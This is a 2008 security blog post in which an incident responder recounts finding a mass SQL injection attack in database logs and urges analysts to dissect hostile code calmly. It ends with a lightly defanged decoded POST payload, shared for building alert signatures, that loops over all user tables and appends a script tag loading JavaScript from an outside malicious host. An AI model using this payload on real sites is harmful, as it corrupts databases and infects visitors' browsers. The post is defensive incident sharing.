So our team uncovered this SQL attack on January 3, 2008. We promptly supplied the info to the SANS ISC, find their write-up here. My advice to those of you who may face this attack, or a similar variant of something like this is to follow the code. (Take caution, use a vm or live CD that you can let get destroyed by malicious actions if necessary)
Our DBA's noticed anomalous activity in certain database transaction logs. Based on the numerous repetitive entries that were present, it was quickly determined to be a bot or poorly managed script attack of some sort. Gather the logs, shut down the system, prepare the CIRT...
I'm going to save the analytical details for another day. Check out the SANS link above if you want to know more about the nuts and bolts of how this one is put together. My point is this: when you face a relatively unknown piece of adversarial code, the only way to defeat it is to understand it. Anti-Virus researchers have been at this for years. In this case, just as in the past, the only way to get a reliable damage assessment escalated to an executive is to roll up your sleeves and dissect the alien specimen. This lead us to the script in the database, 0.js. The script called a website with a hidden iframe. That's the point you know that there is a high probability that this is an XSS attack. The target is the unsuspecting end user...
All this is to say, in this volatile space of information security, we still tend to act too quickly based on the FUD factor (Fear, Uncertainty and Doubt). Take a step back, remember to breathe, and remember that this is all in a days work of a security geek. Most of all have fun and learn.
P.S. here is a decoded POST, it should help to build alert signatures (asterisks and dots to hide the buggies):
P*ST /list***.asp ACTION=FIND&QUERY=B;DECLARE @S NVARCHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''*sc**pt src=h**p://c dot uc8010 dot com/0.js**/scr**t*''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS NVARCHAR(4000));EXEC(@S);**
Friday, January 11, 2008
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment